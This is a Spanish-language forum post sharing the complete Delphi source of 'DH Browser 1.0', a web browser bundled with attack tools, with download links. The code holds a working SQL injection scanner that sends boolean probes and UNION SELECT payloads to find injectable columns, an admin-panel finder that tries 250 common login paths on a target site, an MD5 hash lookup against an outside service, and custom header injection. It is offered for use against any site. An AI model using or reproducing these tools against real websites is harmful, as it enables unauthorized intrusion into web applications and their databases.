[Delphi] DH Browser 1.0

Iniciado por BigBear, Septiembre 04, 2016, 09:34:41 PM

Tema anterior - Siguiente tema

0 Miembros y 2 Visitantes están viendo este tema.

Un navegador web en Delphi con las siguientes opciones :

  • Podes ver el codigo fuente de la pagina cargado
  • Se puede modificar los headers para HTTP Header Injection
  • Se puede buscar palabras en el codigo fuente
  • SQLI Scanner incorporado
  • Admin Finder incorporado
  • Crack MD5 incorporado

    Una imagen :



    El codigo :

    Código: delphi

    // DH Browser 1.0
    // (C) Doddy Hackman 2016
    // Credits :
    // Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242
    // FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143
    // Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm

    unit dh;

    interface

    uses
      Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants,
      System.Classes, Vcl.Graphics,
      Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.StdCtrls, Vcl.OleCtrls, SHDocVw,
      Vcl.Imaging.pngimage, Vcl.ExtCtrls, Vcl.ComCtrls, mshtml, Vcl.Menus,
      IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient, IdHTTP, PerlRegEx,
      IdMultipartFormData, Vcl.ImgList, Vcl.Styles.Utils.ComCtrls,
      Vcl.Styles.Utils.Menus,
      Vcl.Styles.Utils.SysStyleHook,
      Vcl.Styles.Utils.SysControls, Vcl.Styles.Utils.Forms,
      Vcl.Styles.Utils.StdCtrls, Vcl.Styles.Utils.ScreenTips;

    type
      TFormHome = class(TForm)
        gbEnterPage: TGroupBox;
        btnEnter: TButton;
        gbHeaders: TGroupBox;
        mmHeaders: TMemo;
        GroupBox3: TGroupBox;
        GroupBox4: TGroupBox;
        gbAbout: TGroupBox;
        txtURL: TEdit;
        imgLogo: TImage;
        imgAbout: TImage;
        btnSQLI_Scanner: TButton;
        btnAdminFinder: TButton;
        btnCrack_MD5: TButton;
        btnSearch_for_text: TButton;
        cbUse_This_Headers: TCheckBox;
        browser: TWebBrowser;
        status: TStatusBar;
        progreso: TProgressBar;
        mmSource: TMemo;
        menu: TPopupMenu;
        ShowSourceHTML1: TMenuItem;
        ShowBrowser1: TMenuItem;
        nave: TIdHTTP;
        buscar_codigo: TFindDialog;
        ilIconos: TImageList;
        lblAbout: TLabel;
        procedure btnEnterClick(Sender: TObject);
        procedure browserDownloadComplete(Sender: TObject);
        procedure browserProgressChange(ASender: TObject;
          Progress, ProgressMax: Integer);
        procedure ShowSourceHTML1Click(Sender: TObject);
        procedure ShowBrowser1Click(Sender: TObject);
        procedure btnSQLI_ScannerClick(Sender: TObject);
        procedure btnAdminFinderClick(Sender: TObject);
        procedure btnCrack_MD5Click(Sender: TObject);
        procedure btnSearch_for_textClick(Sender: TObject);
        procedure buscar_codigoFind(Sender: TObject);
        procedure FormCreate(Sender: TObject);

      private
        { Private declarations }
      public
        { Public declarations }
      end;

    var
      FormHome: TFormHome;

    implementation

    {$R *.dfm}

    procedure TFormHome.btnAdminFinderClick(Sender: TObject);
    const
      paginas: array [1 .. 250] of string = ('admin/admin.asp', 'admin/login.asp',
        'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx',
        'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx',
        'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp',
        'asp/admin/admin.aspx', 'asp/admin/webmaster.asp',
        'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx',
        'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp',
        'login/index.asp', 'login/index.aspx', 'login/login.asp',
        'login/login.aspx', 'login/admin.asp', 'login/admin.aspx',
        'administracion/index.asp', 'administracion/index.aspx',
        'administracion/login.asp', 'administracion/login.aspx',
        'administracion/webmaster.asp', 'administracion/webmaster.aspx',
        'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/',
        'admin/admin.php', 'admin/index.php', 'admin/login.php', 'admin/system.php',
        'admin/ingresar.php', 'admin/administrador.php', 'admin/default.php',
        'administracion/', 'administracion/index.php', 'administracion/login.php',
        'administracion/ingresar.php', 'administracion/admin.php',
        'administration/', 'administration/index.php', 'administration/login.php',
        'administrator/index.php', 'administrator/login.php',
        'administrator/system.php', 'system/', 'system/login.php', 'admin.php',
        'login.php', 'administrador.php', 'administration.php', 'administrator.php',
        'admin1.html', 'admin1.php', 'admin2.php', 'admin2.html', 'yonetim.php',
        'yonetim.html', 'yonetici.php', 'yonetici.html', 'adm/',
        'admin/account.php', 'admin/account.html', 'admin/index.html',
        'admin/login.html', 'admin/home.php', 'admin/controlpanel.html',
        'admin/controlpanel.php', 'admin.html', 'admin/cp.php', 'admin/cp.html',
        'cp.php', 'cp.html', 'administrator/', 'administrator/index.html',
        'administrator/login.html', 'administrator/account.html',
        'administrator/account.php', 'administrator.html', 'login.html',
        'modelsearch/login.php', 'moderator.php', 'moderator.html',
        'moderator/login.php', 'moderator/login.html', 'moderator/admin.php',
        'moderator/admin.html', 'moderator/', 'account.php', 'account.html',
        'controlpanel/', 'controlpanel.php', 'controlpanel.html',
        'admincontrol.php', 'admincontrol.html', 'adminpanel.php',
        'adminpanel.html', 'admin1.asp', 'admin2.asp', 'yonetim.asp',
        'yonetici.asp', 'admin/account.asp', 'admin/home.asp',
        'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp',
        'administrator/index.asp', 'administrator/login.asp',
        'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp',
        'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp',
        'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp',
        'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html',
        'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/',
        'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php',
        'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp',
        'Server/', 'wpadmin/', 'administr8.php', 'administr8.html', 'administr8/',
        'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp',
        'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp',
        'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/',
        'useradmin/', 'sysadmins/', 'admin1/', 'systemadministration/',
        'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/',
        'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/',
        'sysadmin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/',
        'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/',
        'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/',
        'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/',
        'login-redirect/', 'sublogin/', 'wplogin/', 'login1/', 'dirlogin/',
        'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/',
        'loginus/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/',
        'phppgadmin/', 'pureadmin/', 'sqladmin/', 'radmind/', 'openvpnadmin/',
        'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/',
        'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/', 'vmailadmin/',
        'Indy_admin/', 'ccp14admin/', 'irc-macadmin/', 'banneradmin/', 'sshadmin/',
        'phpldapadmin/', 'macadmin/', 'administratoraccounts/', 'admin4_account/',
        'admin4_colon/', 'radmind1/', 'SuperAdmin/', 'AdminTools/', 'cmsadmin/',
        'SysAdmin2/', 'globes_admin/', 'cadmins/', 'phpSQLiteAdmin/',
        'navSiteAdmin/', 'server_admin_small/', 'logo_sysadmin/', 'server/',
        'database_administration/', 'power_user/', 'system_administration/',
        'ss_vms_admin_sm/');
    var
      i: Integer;
      control: Integer;

    var
      cabeceras: OLEVariant;
      uno: OLEVariant;
      dos: OLEVariant;
      tres: OLEVariant;

    begin

      if not(txtURL.Text = '') then
      begin
        control := 0;

        status.Panels[0].Text := '[+] Finding Panel ....';
        FormHome.status.Update;

        for i := Low(paginas) to High(paginas) do

          if (control = 1) then
          begin
            Abort;
          end
          else
          begin

            try

              status.Panels[0].Text := '[+] Testing : ' + paginas[i];
              FormHome.status.Update;

              nave.Get(txtURL.Text + '/' + paginas[i]);
              if nave.ResponseCode = 200 then
              begin

                txtURL.Text := txtURL.Text + '/' + paginas[i];

                uno := navNoReadFromCache or navNoWriteToCache;
                dos := '';
                tres := '';

                if (cbUse_This_Headers.Checked) then
                begin
                  cabeceras := mmHeaders.Text;
                  browser.Navigate(txtURL.Text, uno, dos, tres, cabeceras);
                end
                else
                begin
                  cabeceras := '';
                  browser.Navigate(txtURL.Text, uno, dos, tres, cabeceras);
                end;
                control := 1;
                status.Panels[0].Text := '[+] Panel Found';
                FormHome.status.Update;
                MessageBox(0, 'Panel Found', 'DH Browser 1.0', MB_ICONINFORMATION);
                Abort;
              end;
            except
              on E: EIdHttpProtocolException do;
              on E: Exception do;
            end;

          end;

        status.Panels[0].Text := '[-] Panel not found';
        FormHome.status.Update;
        MessageBox(0, 'Panel not found', 'DH Browser 1.0', MB_ICONERROR);
      end
      else
      begin
        MessageBox(0, 'Enter URL', 'DH Browser 1.0', MB_ICONINFORMATION);
      end;

    end;

    procedure TFormHome.browserDownloadComplete(Sender: TObject);
    var
      buscador: IHTMLElement;
    begin

      progreso.Position := 0;

      status.Panels[0].Text := '[+] Page loaded';
      FormHome.status.Update;

      // Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm

      begin

        try
          begin

            mmSource.Clear;

            buscador := (browser.Document AS IHTMLDocument2).body;

            while not(buscador.parentElement = nil) do
            begin
              buscador := buscador.parentElement;
            end;
            mmSource.Lines.Add(buscador.outerHTML);
          end;
        except
          // ??
        end;
      end;
    end;

    procedure TFormHome.browserProgressChange(ASender: TObject;
      Progress, ProgressMax: Integer);
    begin
      progreso.Max := ProgressMax;
      progreso.Position := Progress;
    end;

    procedure TFormHome.buscar_codigoFind(Sender: TObject);
    // FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143

    var
      aca: PChar;
      aca2: PChar;
      acatoy: PChar;
      acatoy2: Word;

    begin

      With Sender as TFindDialog do

      begin

        GetMem(aca2, Length(FindText) + 1);
        StrPCopy(aca2, FindText);

        acatoy2 := mmSource.GetTextLen + 1;
        GetMem(aca, acatoy2);

        mmSource.GetTextBuf(aca, acatoy2);

        acatoy := aca + mmSource.SelStart + mmSource.SelLength;
        acatoy := StrPos(acatoy, aca2);

        if not(acatoy = NIL) then
        begin
          mmSource.SelStart := acatoy - aca;
          mmSource.SelLength := Length(FindText);
        end;

        mmSource.SetFocus;

      end;

    end;

    procedure TFormHome.btnCrack_MD5Click(Sender: TObject);
    var
      md5: string;
      datos: TIdMultiPartFormDataStream;
      code: string;
      regex_check: TPerlRegEx;
      cracked: string;
    begin

      md5 := InputBox('DH Browser 1.0', 'MD5 : ', '');

      if not(md5 = '') then
      begin
        regex_check := TPerlRegEx.Create();
        datos := TIdMultiPartFormDataStream.Create;
        datos.AddFormField('pass', md5);
        datos.AddFormField('option', 'hash2text');
        datos.AddFormField('send', 'Submit');

        status.Panels[0].Text := '[+] Cracking ...';
        FormHome.status.Update;

        code := nave.Post('http://md5online.net/index.php', datos);

        regex_check.regex :=
          '<center><p>md5 :<b>(.*?)</b> <br>pass : <b>(.*?)</b></p>';
        regex_check.Subject := code;

        if regex_check.Match then
        begin
          cracked := regex_check.Groups[2];
          status.Panels[0].Text := '[+] MD5 Cracked : ' + cracked;
          FormHome.status.Update;
          MessageBox(0, PChar('MD5 Cracked : ' + cracked), 'DH Browser 1.0',
            MB_ICONINFORMATION);

        end
        else
        begin
          status.Panels[0].Text := '[-] Not found';
          FormHome.status.Update;
          MessageBox(0, 'Not found', 'DH Browser 1.0', MB_ICONERROR);
        end;
      end;

    end;

    procedure TFormHome.btnEnterClick(Sender: TObject);
    // Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242

    var

      cabeceras: OLEVariant;
      uno: OLEVariant;
      dos: OLEVariant;
      tres: OLEVariant;

    begin

      uno := navNoReadFromCache or navNoWriteToCache;
      dos := '';
      tres := '';

      if (cbUse_This_Headers.Checked) then
      begin
        cabeceras := mmHeaders.Text;
        browser.Navigate(txtURL.Text, uno, dos, tres, cabeceras);
      end
      else
      begin
        cabeceras := '';
        browser.Navigate(txtURL.Text, uno, dos, tres, cabeceras);
      end;

    end;

    procedure TFormHome.FormCreate(Sender: TObject);
    begin
      UseLatestCommonDialogs := False;
    end;

    procedure TFormHome.btnSearch_for_textClick(Sender: TObject);
    begin
      buscar_codigo.Execute;
    end;

    procedure TFormHome.ShowBrowser1Click(Sender: TObject);
    begin
      browser.Visible := True;
      mmSource.Visible := False;
    end;

    procedure TFormHome.ShowSourceHTML1Click(Sender: TObject);
    begin
      browser.Visible := False;
      mmSource.Visible := True;
    end;

    procedure TFormHome.btnSQLI_ScannerClick(Sender: TObject);
    var
      pass1: string;
      pass2: string;
      code: string;
      urltest: string;
      urlgen: string;
      full: string;
      codedos: string;
      i: Integer;
      regex_check: TPerlRegEx;

    var

      cabeceras: OLEVariant;
      uno: OLEVariant;
      dos: OLEVariant;
      tres: OLEVariant;

    begin

      if not(txtURL.Text = '') then
      begin
        regex_check := TPerlRegEx.Create();

        status.Panels[0].Text := '[+] SQLI Scanning ...';
        FormHome.status.Update;

        pass1 := '+';
        pass2 := '--';

        urltest := 'concat(0x4b30425241,1,0x4b30425241)';

        status.Panels[0].Text := '[+] Checking ...';
        FormHome.status.Update;

        code := nave.Get(txtURL.Text + '1' + pass1 + 'and' + pass1 + '1=1' + pass2);

        codedos := nave.Get(txtURL.Text + '1' + pass1 + 'and' + pass1 +
          '1=0' + pass2);

        if not(code = codedos) then
        begin

          status.Panels[0].Text := '[+] Finding columns number';
          FormHome.status.Update;

          urltest := '1' + pass1 + 'and' + pass1 + '1=0' + pass1 + 'union' + pass1 +
            'select' + pass1 + 'concat(0x4b30425241,1,0x4b30425241)';
          urlgen := '1';
          for i := 2 to 36 do
          begin

            status.Panels[0].Text := '[+] Columns Length : ' + IntToStr(i);
            FormHome.status.Update;
            urltest := urltest + ',concat(0x4b30425241,' + IntToStr(i) +
              ',0x4b30425241)';
            urlgen := urlgen + ',' + IntToStr(i);
            code := nave.Get(txtURL.Text + urltest + pass2);

            regex_check.regex := 'K0BRA(.*?)K0BRA';
            regex_check.Subject := code;

            if regex_check.Match then
            begin

              urlgen := StringReplace(urlgen, regex_check.Groups[1], 'hackman', []);
              full := txtURL.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass1 +
                'union' + pass1 + 'select' + pass1 + urlgen;

              txtURL.Text := full;

              uno := navNoReadFromCache or navNoWriteToCache;
              dos := '';
              tres := '';

              if (cbUse_This_Headers.Checked) then
              begin
                cabeceras := mmHeaders.Text;
                browser.Navigate(txtURL.Text, uno, dos, tres, cabeceras);
              end
              else
              begin
                cabeceras := '';
                browser.Navigate(txtURL.Text, uno, dos, tres, cabeceras);
              end;
              status.Panels[0].Text := '[+] SQI Scanner Finished';
              FormHome.status.Update;
              MessageBox(0, 'SQI Scanner Finished', 'DH Browser 1.0',
                MB_ICONINFORMATION);

              Abort;

            end;

          end;
          status.Panels[0].Text := '[-] Columns length not found';
          FormHome.status.Update;
          MessageBox(0, 'Columns length not found', 'DH Browser 1.0', MB_ICONERROR);
        end
        else
        begin
          status.Panels[0].Text := '[-] Not vulnerable';
          FormHome.status.Update;
          MessageBox(0, 'Not vulnerable', 'DH Browser 1.0', MB_ICONERROR);
        end;

        status.Panels[0].Text := '[+] Done';
        FormHome.status.Update;
      end
      else
      begin
        MessageBox(0, 'Enter URL', 'DH Browser 1.0', MB_ICONINFORMATION);
      end;

    end;

    end.

    // The End ?


    Si quieren bajar el programa lo pueden hacer de aca :

    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

    Eso seria todo.